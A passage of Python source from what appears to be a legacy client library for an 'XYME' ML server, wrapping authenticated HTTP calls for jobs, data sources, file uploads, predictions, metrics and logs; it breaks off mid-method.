if method == METHOD_POST:
req = requests.post(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_PUT:
req = requests.put(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_DELETE:
req = requests.delete(url, json=args)
if req.status_code == 403:
raise AccessDenied(req.text)
if req.status_code == 200:
return json.loads(req.text)
raise ValueError(
f"error {req.status_code} in worker request:\n{req.text}")
if method == METHOD_LONGPOST:
try:
return quick_server.worker_request(url, args)
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as json_e:
if req is None:
raise
raise ValueError(req.text) from json_e
def _login(self) -> None:
if self._user is None or self._password is None:
raise ValueError("cannot login without user or password")
res = cast(UserLogin, self._raw_request_json(METHOD_POST, "/login", {
"user": self._user,
"pw": self._password,
}))
if not res["success"]:
raise AccessDenied("login was not successful")
self._token = res["token"]
self._permissions = res["permissions"]
def logout(self) -> None:
if self._token is None:
return
self._raw_request_json(METHOD_POST, "/logout", {
"token": self._token,
})
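# The authenticated _request_* wrappers inject the session token into the
# arguments and transparently log in again once if the server answers
# with AccessDenied (e.g. an expired token).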
def _request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
api_version: Optional[int] = None) -> BytesIO:
if self._token is None:
self._login()
def execute() -> BytesIO:
args["token"] = self._token
return self._raw_request_bytes(
method, path, args, add_prefix, api_version)
try:
return execute()
except AccessDenied:
self._login()
return execute()
def _request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
capture_err: bool,
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
if self._token is None:
self._login()
def execute() -> Dict[str, Any]:
args["token"] = self._token
res = self._raw_request_json(
method, path, args, add_prefix, files, api_version)
if capture_err and "errMessage" in res and res["errMessage"]:
raise ValueError(res["errMessage"])
return res
try:
return execute()
except AccessDenied:
self._login()
return execute()
def get_user_info(self) -> UserInfo:
return cast(UserInfo, self._request_json(
METHOD_POST, "/username", {}, capture_err=False))
def get_server_version(self, legacy: bool = False) -> VersionInfo:
if legacy:
return cast(VersionInfo, self._raw_request_json(
METHOD_GET, "/version", {}, api_version=0))
return cast(VersionInfo, self._raw_request_json(
METHOD_GET, "/xyme/version", {}, add_prefix=False))
def afterupdate(self) -> MaintenanceInfo:
return cast(MaintenanceInfo, self._request_json(
METHOD_POST, "/afterupdate", {}, capture_err=False))
def set_maintenance_mode(self, is_maintenance: bool) -> MaintenanceInfo:
"""Set the maintenance mode of the server
Args:
is_maintenance (bool): If the server should be in maintenance mode.
Returns:
MaintenanceInfo: MaintenanceInfo object.
"""
return cast(MaintenanceInfo, self._request_json(
METHOD_PUT, "/maintenance", {
"isMaintenance": is_maintenance,
}, capture_err=False))
def get_maintenance_mode(self) -> HintedMaintenanceInfo:
return cast(HintedMaintenanceInfo, self._request_json(
METHOD_GET, "/maintenance", {}, capture_err=False))
def get_system_logs(
self,
query: Optional[str] = None,
context: Optional[int] = None) -> StdoutWrapper:
obj: Dict[str, Any] = {
"logsKind": "regular",
}
if query is not None:
obj["query"] = query
if context is not None:
obj["context"] = context
res = cast(SystemLogResponse, self._request_json(
METHOD_GET, "/monitor_logs", obj, capture_err=False))
return StdoutWrapper({
"lines": res["logs"] if res["logs"] is not None else [],
"messages": {},
"exceptions": [],
})
def get_system_overview(self) -> OverviewResponse:
return cast(OverviewResponse, self._request_json(
METHOD_GET, "/overview", {}, capture_err=False))
def create_job(
self,
schema: Optional[Dict[str, Any]] = None,
from_job_id: Optional[str] = None,
name: Optional[str] = None,
is_system_preset: bool = False) -> 'JobHandle':
schema_str = json.dumps(schema) if schema is not None else None
obj: Dict[str, Any] = {
"schema": schema_str,
}
if schema_str is not None and schema_str:
obj["isSystemPreset"] = is_system_preset
if from_job_id is not None:
obj["fromId"] = from_job_id
if name is not None:
obj["name"] = name
res = cast(JobCreateResponse, self._request_json(
METHOD_LONGPOST, "/create_job_id", obj, capture_err=True))
return JobHandle(
client=self,
job_id=res["jobId"],
path=res["path"],
name=res["name"],
schema_obj=json.loads(res["schema"]),
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def get_job(self, job_id: str) -> 'JobHandle':
return JobHandle(
client=self,
job_id=job_id,
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def start_job(
self,
job_id: Optional[str],
job_name: Optional[str] = None,
schema: Optional[Dict[str, Any]] = None,
user: Optional[str] = None,
company: Optional[str] = None,
nowait: Optional[bool] = None) -> JobStartResponse:
obj: Dict[str, Any] = {}
if job_id is not None:
if job_name is not None or schema is not None:
raise ValueError(
"can only start by job_id or by job_name and schema "
f"job_id: {job_id} job_name: {job_name} schema: {schema}")
obj["jobId"] = job_id
else:
obj["job_name"] = job_name
obj["schema"] = json.dumps(schema)
if user is not None:
obj["user"] = user
if company is not None:
obj["company"] = company
if nowait is not None:
obj["nowait"] = nowait
return cast(JobStartResponse, self._request_json(
METHOD_LONGPOST, "/start", obj, capture_err=True))
def _raw_job_list(
self,
search: Optional[str] = None,
selected_status: Optional[List[str]] = None,
active_workspace: Optional[List[str]] = None,
) -> JobListResponse:
obj: Dict[str, Any] = {}
if search is not None:
obj["search"] = search
if selected_status is not None:
obj["selectedStatus"] = selected_status
if active_workspace is not None:
obj["activeWorkspace"] = active_workspace
return cast(JobListResponse, self._request_json(
METHOD_LONGPOST, "/jobs", obj, capture_err=False))
def get_workspaces(self) -> Dict[str, int]:
res = self._raw_job_list(None, None, None)
return res["counts"]
def get_jobs(self, workspace: str) -> List['JobHandle']:
res = self._raw_job_list(None, None, [workspace])
return [
JobHandle(
client=self,
job_id=job["jobId"],
path=job["path"],
name=job["name"],
schema_obj=None,
kinds=job["kinds"],
status=job["status"],
permalink=job["permalink"],
time_total=job["timeTotal"],
time_start=job["timeStart"],
time_end=job["timeEnd"],
time_estimate=job["timeEstimate"])
for job in res["jobs"][workspace]
]
def get_shareable(self) -> List[ShareablePath]:
res = cast(ShareList, self._request_json(
METHOD_LONGPOST, "/share", {}, capture_err=False))
return [{
"name": name,
"path": path,
} for (name, path) in res["shareable"]]
def _raw_create_source(
self,
source_type: str,
name: Optional[str],
job: Optional['JobHandle'],
multi_source: Optional['SourceHandle'],
from_id: Optional['SourceHandle'],
) -> CreateSource:
if source_type not in ALL_SOURCE_TYPES:
raise ValueError(
f"invalid source type: {source_type}\nmust be one of "
f"{', '.join(ALL_SOURCE_TYPES)}")
multi_source_id = None
if multi_source is not None:
if not multi_source.is_multi_source():
raise ValueError(
f"source {multi_source.get_source_id()} "
"must be multi source")
multi_source_id = multi_source.get_source_id()
from_id_str = from_id.get_source_id() if from_id is not None else None
res = cast(CreateSourceResponse, self._request_json(
METHOD_LONGPOST, "/create_source_id", {
"name": name,
"type": source_type,
"job": job.get_job_id() if job is not None else None,
"multiSourceId": multi_source_id,
"fromId": from_id_str,
}, capture_err=True))
job_schema_str = res["jobSchema"]
if job is not None and job_schema_str:
job._schema_obj = json.loads(job_schema_str)
return {
"multi_source": SourceHandle(
self, res["multiSourceId"], SOURCE_TYPE_MULTI),
"source": SourceHandle(self, res["sourceId"], source_type),
}
def create_multi_source(self, name: Optional[str]) -> 'SourceHandle':
res = self._raw_create_source(
SOURCE_TYPE_MULTI, name, None, None, None)
return res["multi_source"]
def create_multi_source_file(
self,
filename: str,
ticker_column: str,
date_column: Optional[str],
name_multi: Optional[str] = None,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'SourceHandle':
with self.bulk_operation():
multi = self.create_multi_source(name_multi)
multi.add_new_source_file(
filename, ticker_column, date_column, progress_bar)
return multi
def create_multi_source_df(
self,
df: pd.DataFrame,
name_csv: str,
ticker_column: str,
date_column: Optional[str],
name_multi: Optional[str] = None,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'SourceHandle':
with self.bulk_operation():
multi = self.create_multi_source(name_multi)
multi.add_new_source_df(
df, name_csv, ticker_column, date_column, progress_bar)
return multi
def get_source(self, source_id: str) -> 'SourceHandle':
return SourceHandle(self, source_id, None, infer_type=True)
def set_immutable_raw(
self,
source: 'SourceHandle',
multi_source: Optional['SourceHandle'],
job: Optional['JobHandle'],
is_immutable: Optional[bool]) -> LockSource:
multi_source_id = None
if multi_source is not None:
if not multi_source.is_multi_source():
raise ValueError(
f"source {multi_source.get_source_id()} "
"must be multi source")
multi_source_id = multi_source.get_source_id()
res = cast(LockSourceResponse, self._request_json(
METHOD_PUT, "/lock_source", {
"sourceId": source.get_source_id(),
"multiSourceId": multi_source_id,
"job": job.get_job_id() if job is not None else None,
"immutable": is_immutable,
}, capture_err=False))
if "multiSourceId" not in res:
res["multiSourceId"] = None
if "sourceSchemaMap" not in res:
res["sourceSchemaMap"] = {}
job_schema_str = res["jobSchema"]
if job is not None and job_schema_str:
job._schema_obj = json.loads(job_schema_str)
if res["newSourceId"] == source.get_source_id():
new_source = source
else:
new_source = SourceHandle(
self, res["newSourceId"], source.get_source_type())
if res["multiSourceId"] is None:
new_multi_source: Optional[SourceHandle] = None
elif res["multiSourceId"] == new_source.get_source_id():
new_multi_source = new_source
elif res["multiSourceId"] == source.get_source_id():
new_multi_source = source
elif multi_source is not None and \
res["multiSourceId"] == multi_source.get_source_id():
new_multi_source = multi_source
else:
new_multi_source = SourceHandle(
self, res["multiSourceId"], SOURCE_TYPE_MULTI)
return {
"new_source": new_source,
"immutable": res["immutable"],
"multi_source": new_multi_source,
"source_schema_map": res["sourceSchemaMap"],
}
def get_sources(
self,
filter_by: Optional[str] = None) -> Iterable['SourceHandle']:
if filter_by is not None and filter_by not in FILTERS:
raise ValueError(f"invalid value for filter_by: {filter_by}")
res = cast(SourcesResponse, self._request_json(
METHOD_GET, "/sources", {}, capture_err=False))
def respond(arr: List[SourceItem]) -> Iterable['SourceHandle']:
for source in arr:
yield SourceHandle(
self, source["id"], source["type"], infer_type=True,
name=source["name"], immutable=source["immutable"],
help_message=source["help"])
if filter_by is None or filter_by == FILTER_SYSTEM:
yield from respond(res["systemSources"])
if filter_by is None or filter_by == FILTER_USER:
yield from respond(res["userSources"])
def create_input(
self,
name: str,
ext: str,
size: int,
hash_str: Optional[str]) -> 'InputHandle':
res = cast(CreateInputResponse, self._request_json(
METHOD_LONGPOST, "/create_input_id", {
"name": name,
"extension": ext,
"size": size,
"hash": None if self.get_api_version() < 1 else hash_str,
}, capture_err=False))
return InputHandle(self, res["inputId"], name=name, ext=ext, size=size)
def get_input(self, input_id: str) -> 'InputHandle':
return InputHandle(self, input_id)
def input_from_io(
self,
io_in: IO[bytes],
name: str,
ext: str,
progress_bar: Optional[IO[Any]] = sys.stdout,
) -> 'InputHandle':
from_pos = io_in.seek(0, io.SEEK_CUR)
size = io_in.seek(0, io.SEEK_END) - from_pos
io_in.seek(from_pos, io.SEEK_SET)
hash_str = get_file_hash(io_in)
with self.bulk_operation():
res: InputHandle = self.create_input(name, ext, size, hash_str)
if not res.is_complete():
res.upload_full(io_in, name, progress_bar)
return res
def input_from_file(
self,
filename: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'InputHandle':
if filename.endswith(f"{INPUT_CSV_EXT}{INPUT_ZIP_EXT}") \
or filename.endswith(f"{INPUT_TSV_EXT}{INPUT_ZIP_EXT}"):
filename = filename[:-len(INPUT_ZIP_EXT)]
ext_pos = filename.rfind(".")
if ext_pos >= 0:
ext = filename[ext_pos + 1:]
else:
ext = ""
fname = os.path.basename(filename)
with open(filename, "rb") as fbuff:
return self.input_from_io(fbuff, fname, ext, progress_bar)
def input_from_df(
self,
df: pd.DataFrame,
name: str,
progress_bar: Optional[IO[Any]] = sys.stdout) -> 'InputHandle':
io_in = df_to_csv(df)
return self.input_from_io(io_in, name, "csv", progress_bar)
def get_inputs(
self, filter_by: Optional[str] = None) -> Iterable['InputHandle']:
if filter_by is not None and filter_by not in FILTERS:
raise ValueError(f"invalid value for filter_by: {filter_by}")
res = cast(InputsResponse, self._request_json(
METHOD_GET, "/user_files", {}, capture_err=False))
def respond(arr: List[InputItem]) -> Iterable['InputHandle']:
for input_obj in arr:
filename = input_obj["file"]
ext_pos = filename.rfind(".")
if ext_pos >= 0:
ext: Optional[str] = filename[ext_pos + 1:]
input_id = filename[:ext_pos]
else:
ext = None
input_id = filename
progress = UPLOAD_DONE if input_obj["immutable"] else None
yield InputHandle(
self,
input_id,
name=input_obj["name"],
path=input_obj["path"],
ext=ext,
progress=progress)
if filter_by is None or filter_by == FILTER_SYSTEM:
yield from respond(res["systemFiles"])
if filter_by is None or filter_by == FILTER_USER:
yield from respond(res["userFiles"])
def get_strategies(self) -> List[str]:
res = cast(StrategyResponse, self._request_json(
METHOD_GET, "/strategies", {}, capture_err=False))
return res["strategies"]
def register(self, user_folder: str) -> bool:
method = METHOD_PUT if self._api_version < 2 else METHOD_LONGPOST
return cast(JobRegisterResponse, self._request_json(
method, "/register_job", {
"userFolder": user_folder,
}, capture_err=True)).get("success", False)
# *** XYMELegacyClient ***
class JobHandle:
def __init__(
self,
client: XYMELegacyClient,
job_id: str,
path: Optional[str],
name: Optional[str],
schema_obj: Optional[Dict[str, Any]],
kinds: Optional[List[str]],
status: Optional[str],
permalink: Optional[str],
time_total: Optional[float],
time_start: Optional[str],
time_end: Optional[str],
time_estimate: Optional[str]) -> None:
self._client = client
self._job_id = job_id
self._name = name
self._path = path
self._schema_obj = schema_obj
self._kinds = kinds
self._permalink = permalink
self._status = status
self._time_total = time_total
self._time_start = time_start
self._time_end = time_end
self._time_estimate = time_estimate
self._buttons: Optional[List[str]] = None
self._can_rename: Optional[bool] = None
self._is_symjob: Optional[bool] = None
self._is_user_job: Optional[bool] = None
self._plot_order_types: Optional[List[str]] = None
self._tabs: Optional[List[str]] = None
self._tickers: Optional[List[str]] = None
self._source: Optional[SourceHandle] = None
self._is_async_fetch = False
self._async_lock = threading.RLock()
def refresh(self) -> None:
self._name = None
self._path = None
self._schema_obj = None
self._kinds = None
self._permalink = None
self._time_total = None
self._time_start = None
self._time_end = None
self._time_estimate = None
self._buttons = None
self._can_rename = None
self._is_symjob = None
self._is_user_job = None
self._plot_order_types = None
self._tabs = None
self._tickers = None
self._source = None
if not self._is_async_fetch:
self._status = None
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _fetch_info(self) -> None:
res = self._client._request_json(
METHOD_LONGPOST, "/status", {
"job": self._job_id,
}, capture_err=False)
if res.get("empty", True) and "name" not in res:
raise ValueError("could not update status")
info = cast(JobStatusInfo, res)
self._name = info["name"]
self._path = info["path"]
self._schema_obj = json.loads(info["schema"])
self._buttons = info["buttons"]
self._can_rename = info["canRename"]
self._is_symjob = info["symjob"]
self._is_user_job = info["isUserJob"]
self._kinds = info["allKinds"]
self._permalink = info["permalink"]
self._plot_order_types = info["plotOrderTypes"]
self._status = info["status"]
self._tabs = info["allTabs"]
self._tickers = info["tickers"]
self._time_total = info["timeTotal"]
self._time_start = info["timeStart"]
self._time_end = info["timeEnd"]
self._time_estimate = info["timeEstimate"]
def get_job_id(self) -> str:
return self._job_id
def get_schema(self) -> Dict[str, Any]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
return copy.deepcopy(self._schema_obj)
def set_schema(self, schema: Dict[str, Any]) -> None:
res = cast(SchemaResponse, self._client._request_json(
METHOD_PUT, "/update_job_schema", {
"job": self._job_id,
"schema": json.dumps(schema),
}, capture_err=True))
self._schema_obj = json.loads(res["schema"])
@contextlib.contextmanager
def update_schema(self) -> Iterator[Dict[str, Any]]:
self._maybe_refresh()
if self._schema_obj is None:
self._fetch_info()
assert self._schema_obj is not None
yield self._schema_obj
self.set_schema(self._schema_obj)
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def get_notes(self, force: bool) -> Optional[NotesInfo]:
res = cast(PreviewNotesResponse, self._client._request_json(
METHOD_LONGPOST, "/preview", {
"job": self._job_id,
"view": "summary",
"force": force,
"schema": None,
"batch": None,
}, capture_err=False))
notes = res["notes"]
if notes is None:
return None
return {
"usage": notes.get("usage", {}),
"roles": notes.get("roles", {}),
"roles_renamed": notes.get("rolesRenamed", {}),
"dummy_columns": notes.get("dummyColumns", []),
"stats": notes.get("stats", {}),
"is_runnable": notes.get("isRunnable", False),
"suggestions": notes.get("suggestions", {}),
"is_preview": notes.get("isPreview", True),
"error": notes.get("error", True),
}
def can_start(self, force: bool) -> bool:
notes = self.get_notes(force)
# NOTE: notes is None if the job has been started
# this is a bug right now
if notes is None:
return True
return notes["is_runnable"] and not notes["error"]
def start(
self,
user: Optional[str] = None,
company: Optional[str] = None,
nowait: Optional[bool] = None) -> JobStartResponse:
if not self.can_start(force=False):
raise ValueError("Cannot start job. Missing data or target?")
res = self._client.start_job(
self._job_id, user=user, company=company, nowait=nowait)
self.refresh()
self._status = "waiting"
return res
def delete(self) -> None:
self._client._request_json(METHOD_DELETE, "/clean", {
"job": self._job_id,
}, capture_err=True)
self.refresh()
def get_name(self) -> str:
self._maybe_refresh()
if self._name is None:
self._fetch_info()
assert self._name is not None
return self._name
def get_path(self) -> str:
self._maybe_refresh()
if self._path is None:
self._fetch_info()
assert self._path is not None
return self._path
def get_status(self, fast_return: bool = True) -> str:
"""Returns the status of the job.
Args:
fast_return (bool): If set, the function is non-blocking:
it immediately returns the last known status value and
fetches the current status in the background, so a future
call eventually reports the freshly fetched status. This
guarantees that the function call does not block for a
long time on freshly started jobs. Defaults to True.
Returns:
str: The status of the job. Most common statuses are:
unknown, draft, waiting, running, killed, error, paused, done
"""
status = self._status
res: str = status if status is not None else "unknown"
def retrieve() -> None:
if self._client.is_auto_refresh() or self._status is None:
self.refresh()
self._status = res
self._fetch_info()
def async_retrieve() -> None:
retrieve()
self._is_async_fetch = False
if not fast_return:
retrieve()
status = self._status
assert status is not None
return status
if self._is_async_fetch:
return res
with self._async_lock:
if self._is_async_fetch:
return res
self._is_async_fetch = True
th = threading.Thread(target=async_retrieve)
th.start()
return res
def can_rename(self) -> bool:
self._maybe_refresh()
if self._can_rename is None:
self._fetch_info()
assert self._can_rename is not None
return self._can_rename
def is_symjob(self) -> bool:
self._maybe_refresh()
if self._is_symjob is None:
self._fetch_info()
assert self._is_symjob is not None
return self._is_symjob
def is_user_job(self) -> bool:
self._maybe_refresh()
if self._is_user_job is None:
self._fetch_info()
assert self._is_user_job is not None
return self._is_user_job
def is_paused(self) -> bool:
return self.get_status() == "paused"
def is_draft(self) -> bool:
return self.get_status() == "draft"
def get_permalink(self) -> str:
self._maybe_refresh()
if self._permalink is None:
self._fetch_info()
assert self._permalink is not None
return self._permalink
def get_tickers(self) -> List[str]:
self._maybe_refresh()
if self._tickers is None:
self._fetch_info()
assert self._tickers is not None
return list(self._tickers)
def set_name(self, name: str) -> None:
res = cast(JobRenameResponse, self._client._request_json(
METHOD_PUT, "/rename", {
"job": self._job_id,
"newJobName": name,
}, capture_err=True))
self._name = res["name"]
self._path = res["path"]
def set_pause(self, is_pause: bool) -> bool:
path = "/pause" if is_pause else "/unpause"
res = cast(JobPauseResponse, self._client._request_json(
METHOD_POST, path, {
"job": self._job_id,
}, capture_err=True))
return is_pause if res["success"] else not is_pause
def input_data(
self,
column: str,
ticker: Optional[str],
slow: bool = False) -> Any:
obj: Dict[str, Any] = {
"job": self._job_id,
"ticker": ticker,
"plot": column,
"allowCat": True,
"slow": slow,
}
return self._client._request_json(
METHOD_LONGPOST, "/input", obj, capture_err=False)
def feature_importance(
self,
method: str,
ticker: Optional[str],
date: Optional[str],
last_n: Optional[int],
agg_mode: Optional[str] = None) -> Any:
obj: Dict[str, Any] = {
"job": self._job_id,
"ticker": ticker,
"method": method,
"date": date,
"filters": {},
}
if agg_mode is not None:
obj["agg_mode"] = agg_mode
if last_n is not None:
obj["last_n"] = last_n
res = self._client._request_json(
METHOD_LONGPOST, "/explain", obj, capture_err=False)
return res
def dynamic_predict(
self,
method: str,
fbuff: Optional[IO[bytes]],
source: Optional['SourceHandle'],
) -> DynamicPredictionResponse:
if fbuff is not None:
res = cast(DynamicPredictionResponse, self._client._request_json(
METHOD_FILE, "/dynamic_predict", {
"job": self._job_id,
"method": method,
}, capture_err=True, files={"file": fbuff}))
elif source is not None:
if self._client.get_api_version() < 1:
raise ValueError("the XYME version does not "
"support dynamic predict sources")
res = cast(DynamicPredictionResponse, self._client._request_json(
METHOD_POST, "/dynamic_predict", {
"job": self._job_id,
"method": method,
"multiSourceId": source.get_source_id(),
}, capture_err=True))
else:
raise ValueError("one of fbuff or source must not be None")
return res
def predict_source(
self,
source: 'SourceHandle',
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
res = self.dynamic_predict("dyn_pred", fbuff=None, source=source)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba_source(
self,
source: 'SourceHandle',
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
res = self.dynamic_predict("dyn_prob", fbuff=None, source=source)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict(
self,
df: pd.DataFrame,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
buff = df_to_csv(df)
res = self.dynamic_predict("dyn_pred", fbuff=buff, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba(
self,
df: pd.DataFrame,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
buff = df_to_csv(df)
res = self.dynamic_predict("dyn_prob", fbuff=buff, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_file(
self,
csv: str,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
with open(csv, "rb") as f_in:
res = self.dynamic_predict("dyn_pred", fbuff=f_in, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def predict_proba_file(
self,
csv: str,
) -> Tuple[Optional[pd.DataFrame], StdoutWrapper]:
with open(csv, "rb") as f_in:
res = self.dynamic_predict("dyn_prob", fbuff=f_in, source=None)
return (
maybe_predictions_to_df(res["predictions"]),
StdoutWrapper(res["stdout"]),
)
def get_table(
self,
offset: int,
size: int,
reverse_order: bool) -> pd.DataFrame:
resp = self._client._request_bytes(
METHOD_POST, "/job_data", {
"job": self._job_id,
"format": "csv",
"offset": offset,
"size": size,
"reverse_order": reverse_order,
})
return pd.read_csv(resp)
def get_predictions_table(
self,
method: Optional[str],
offset: int,
size: int,
reverse_order: bool = False) -> Optional[pd.DataFrame]:
resp = self._client._request_bytes(
METHOD_GET, "/predictions", {
"job": self._job_id,
"format": "csv",
"method": method,
"last_n": size,
"offset": offset,
"reverse_order": reverse_order,
})
return pd.read_csv(resp)
def get_predictions(
self,
method: Optional[str],
ticker: Optional[str],
date: Optional[str],
last_n: int,
filters: Optional[Dict[str, Any]]) -> Optional[pd.DataFrame]:
if filters is None:
filters = {}
res = cast(SimplePredictionsResponse, self._client._request_json(
METHOD_LONGPOST, "/predictions", {
"job": self._job_id,
"method": method,
"ticker": ticker,
"date": date,
"last_n": last_n,
"filters": filters,
}, capture_err=False))
columns = res.get("columns", None)
predictions = res.get("predictions", None)
if columns is not None and predictions is not None:
return pd.DataFrame(predictions, columns=columns)
return None
def share(self, path: str) -> 'JobHandle':
shared = cast(ShareResponse, self._client._request_json(
METHOD_PUT, "/share", {
"job": self._job_id,
"with": path,
}, capture_err=True))
return JobHandle(
client=self._client,
job_id=shared["job"],
path=None,
name=None,
schema_obj=None,
kinds=None,
status=None,
permalink=None,
time_total=None,
time_start=None,
time_end=None,
time_estimate=None)
def create_source(
self,
source_type: str,
name: Optional[str] = None) -> 'SourceHandle':
res = self._client._raw_create_source(
source_type, name, self, None, None)
return res["source"]
def get_sources(self) -> List['SourceHandle']:
schema_obj = self.get_schema()
x_obj = schema_obj.get("X", {})
res = []
main_source_id = x_obj.get("source", None)
if main_source_id:
res.append(SourceHandle(
self._client, main_source_id, None, infer_type=True))
for progress in x_obj.get("source_progress", []):
cur_source_ix = progress.get("source", None)
if cur_source_ix:
res.append(SourceHandle(
self._client, cur_source_ix, None, infer_type=True))
return res
def get_fast_segments(self) -> List[
Tuple[Optional[pd.Timestamp], Optional[pd.Timestamp]]]:
schema_obj = self.get_schema()
x_obj = schema_obj.get("X", {})
res: List[Tuple[Optional[pd.Timestamp], Optional[pd.Timestamp]]] = \
[(None, None)]
res.extend((
maybe_timestamp(progress.get("start_time")),
maybe_timestamp(progress.get("end_time")),
) for progress in x_obj.get("source_progress", []))
return res
def get_segments(
self,
ticker: Optional[str] = None) -> List[Tuple[
int, Optional[pd.Timestamp], Optional[pd.Timestamp]]]:
res = cast(SegmentResponse, self._client._request_json(
METHOD_LONGPOST, "/segments", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=False))
return [
(rows, maybe_timestamp(start_time), maybe_timestamp(end_time))
for (rows, start_time, end_time) in res.get("segments", [])
]
def get_main_source(self, ticker: Optional[str] = None) -> 'SourceHandle':
self._maybe_refresh()
if self._source is not None:
return self._source
res = cast(SourceResponse, self._client._request_json(
METHOD_GET, "/job_source", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=True))
self._source = SourceHandle(
self._client, res["sourceId"], None, infer_type=True)
return self._source
def set_main_source(self, source: 'SourceHandle') -> None:
with self.update_schema() as obj:
x_obj = obj.get("X", {})
x_obj["source"] = source.get_source_id()
obj["X"] = x_obj
def append_source(
self,
source: 'SourceHandle',
start_time: Optional[Union[str, pd.Timestamp]],
end_time: Optional[Union[str, pd.Timestamp]],
change_set: Optional[Dict[str, Any]] = None) -> None:
with self.update_schema() as obj:
x_obj = obj.get("X", {})
progress = x_obj.get("source_progress", [])
progress.append({
"source": source.get_source_id(),
"start_time": None if start_time is None else f"{start_time}",
"end_time": None if end_time is None else f"{end_time}",
"change_set": {} if change_set is None else change_set,
})
x_obj["source_progress"] = progress
obj["X"] = x_obj
def inspect(self, ticker: Optional[str]) -> 'InspectHandle':
return InspectHandle(self._client, self, ticker)
def get_metrics(self, kind: str = PLOT_PKL) -> MetricListInfo:
res = cast(MetricListResponse, self._client._request_json(
METHOD_LONGPOST, "/metric_plots", {
"job": self._job_id,
"kind": kind,
}, capture_err=False))
return {
"metrics": res["metrics"],
"selected_plots": res["selectedPlots"],
"hidden_plots": res["hiddenPlots"],
}
def get_data_plots(self) -> DataPlotListInfo:
res = cast(DataPlotListResponse, self._client._request_json(
METHOD_LONGPOST, "/data_plots", {
"job": self._job_id,
}, capture_err=False))
return {
"data_plots": res["dataPlots"],
"selected_plots": res["selectedPlots"],
"hidden_plots": res["hiddenPlots"],
}
def select_plots(
self,
plots: List[List[str]],
plot_type: str) -> List[List[str]]:
res = cast(SelectPlotsResponse, self._client._request_json(
METHOD_PUT, "/select_plots", {
"job": self._job_id,
"selectedPlots": plots,
"type": plot_type,
}, capture_err=False))
return res["selectedPlots"]
def hide_plot(self, plot: List[str], plot_type: str, hide: bool) -> bool:
return cast(HidePlotResponse, self._client._request_json(
METHOD_PUT, "/hide_plot", {
"hide": hide,
"job": self._job_id,
"plot": plot,
"type": plot_type,
}, capture_err=True)).get("success", False)
def get_metric(
self,
metric: str,
ticker: Optional[str],
kind: str = PLOT_PKL) -> Optional[MetricWrapper]:
res = cast(MetricResponse, self._client._request_json(
METHOD_LONGPOST, "/metric", {
"job": self._job_id,
"kind": kind,
"metric": metric,
"ticker": ticker,
}, capture_err=False))
plot = res["lines"]
if not plot:
return None
if plot["kind"] == "time":
return MetricPlot(plot)
if plot["kind"] == "coord":
return MetricCoords(plot)
raise ValueError(f"invalid plot kind: {plot['kind']}")
def _raw_stdout(
self,
ticker: Optional[str],
do_filter: bool,
query_str: Optional[str],
pos: Optional[int],
context: int,
before: Optional[int],
after: Optional[int]) -> List[StdoutLine]:
res = cast(JobStdoutResponse, self._client._request_json(
METHOD_POST, "/stdout", {
"job": self._job_id,
"ticker": ticker,
"filter": do_filter,
"query": query_str,
"pos": pos,
"context": context,
"before": before,
"after": after,
}, capture_err=False))
return res["lines"]
def get_logs(self) -> StdoutWrapper:
return StdoutWrapper({
"lines": self._raw_stdout(None, False, None, None, 0, None, None),
"messages": {},
"exceptions": [],
})
def get_summary(self, ticker: Optional[str]) -> SummaryInfo:
res = cast(SummaryResponse, self._client._request_json(
METHOD_LONGPOST, "/summary", {
"job": self._job_id,
"ticker": ticker,
}, capture_err=False))
messages = res.get("messages")
exceptions = res.get("exceptions")
stdout = StdoutWrapper({
"messages": {} if messages is None else messages,
"exceptions": [] if exceptions is None else exceptions,
"lines": [],
})
data_start = res.get("dataStart")
data_high = res.get("dataHigh")
data_end = res.get("dataEnd")
return {
"stdout": stdout,
"last_event": res.get("lastEvent"),
"rows": res.get("rows"),
"rows_total": res.get("rowsTotal"),
"features": res.get("features"),
"dropped_features": res.get("droppedFeatures"),
"data_start": maybe_timestamp(data_start),
"data_high": maybe_timestamp(data_high),
"data_end": maybe_timestamp(data_end),
}
def get_backtest(
self,
strategy: Optional[str],
base_strategy: Optional[str],
price_source: Optional['SourceHandle'],
prediction_feature: Optional[str],
ticker: Optional[str] = None,
) -> Tuple[Optional[Dict[str, Any]], StdoutWrapper]:
